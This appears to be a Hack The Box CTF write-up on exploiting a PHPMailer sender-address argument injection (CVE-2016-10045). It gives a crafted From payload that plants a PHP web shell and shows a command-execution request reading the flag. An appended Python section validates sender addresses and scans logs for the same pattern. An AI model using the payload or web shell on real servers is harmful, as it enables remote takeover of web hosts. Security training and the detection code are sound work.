https://app.hackthebox.com/challenges/373

Description

A high-profile political individual was a victim of a spear-phishing attack. The email came from a legitimate government entity in a nation where we don't have jurisdiction. However, we have traced the originating mail to a government webserver. Further enumeration revealed an open directory index containing a PHP mailer script we think was used to send the email. We need access to the server to read the logs and find out the actual perpetrator. Can you help?

Exploitation

The open directory index exposes /mailer.php, the mail-sending script.

References for the PHPMailer sender-address argument injection and its patch bypass (CVE-2016-10045):

https://www.exploit-db.com/exploits/40969

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html

From Email (the sender address the script hands to sendmail)

"attacker\" -oQ/tmp/ -X/var/www/html/rce.php  some "@email.com

Email List

<?php system($_GET['0']); ?>
/rce.php?0=cat /flag.txt
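Added example, not part of this writeup or of PHPMailer: the server-side check the script's maintainer could apply to a submitted From address (refuse anything that is not a bare mailbox, which is the idea behind the published fix), plus a scan over constructed request-log lines that flags the sendmail-option pattern shown above for triage. Function names, the log format and the sample entries are my own assumptions.

```python
import re

# A plain mailbox: no whitespace, quotes or backslashes, which are the
# characters that let an address smuggle extra arguments onto the
# sendmail command line (CVE-2016-10045 and the advisory it bypasses).
_PLAIN_ADDR = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# A token starting with '-' after whitespace looks like a sendmail option
# (-oQ selects the queue directory, -X writes a transcript file).
_SENDMAIL_OPT = re.compile(r"(?:^|\s)-(?:oQ|X|C|O)\S*")


def is_safe_sender(addr: str) -> bool:
    """Accept only a bare mailbox; anything else is refused before sendmail runs."""
    return _PLAIN_ADDR.fullmatch(addr) is not None


def classify_sender(addr: str) -> str:
    """Return 'ok', 'arg-injection' or 'malformed' for a submitted From value."""
    if is_safe_sender(addr):
        return "ok"
    if _SENDMAIL_OPT.search(addr):
        return "arg-injection"
    return "malformed"


# Constructed log excerpt (hypothetical format): one line per POST the mailer handled.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z POST /mailer.php from=alice@example.com
2024-01-01T10:00:05Z POST /mailer.php from="attacker\\" -oQ/tmp/ -X/var/www/html/rce.php  some "@email.com
2024-01-01T10:00:09Z POST /mailer.php from=bob@example
"""


def scan_log(text: str) -> list[tuple[str, str]]:
    """Pair each logged From value with its classification for incident triage."""
    results = []
    for line in text.splitlines():
        m = re.search(r"from=(.*)$", line)
        if m:
            results.append((m.group(1), classify_sender(m.group(1))))
    return results


if __name__ == "__main__":
    for value, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:14} {value}")
```

A hit classified as arg-injection should be followed by checking the web root and the sendmail queue directory for files the transcript option may have written.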

Summary

Letter Dispair: find the command execution path, trigger it cleanly, and read the flag.